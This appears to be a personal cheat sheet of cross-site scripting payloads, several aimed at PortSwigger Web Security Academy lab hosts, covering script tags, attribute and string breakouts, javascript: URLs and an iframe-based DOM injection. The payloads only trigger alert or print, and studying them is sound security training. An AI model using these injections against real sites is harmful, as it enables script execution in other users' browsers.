<!--XSS HTML-->
<script>alert("1")</script>

<!--DOC XSS-->
"><svg onload=alert(1)>'

<!--Anchor-->
https://0a3d003703da85378163e41e00e300d9.web-security-academy.net/feedback?returnPath=javascript:alert(1)

<!--Selector-->
<iframe src="https://0a740075032e299b80e2038300710070.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

<!--HTML Encoded-->
"onmouseover="alert(1)

<!--Double Quotes-->
javascript:alert(1)

<!--Reflected XSS-->
';alert(1);'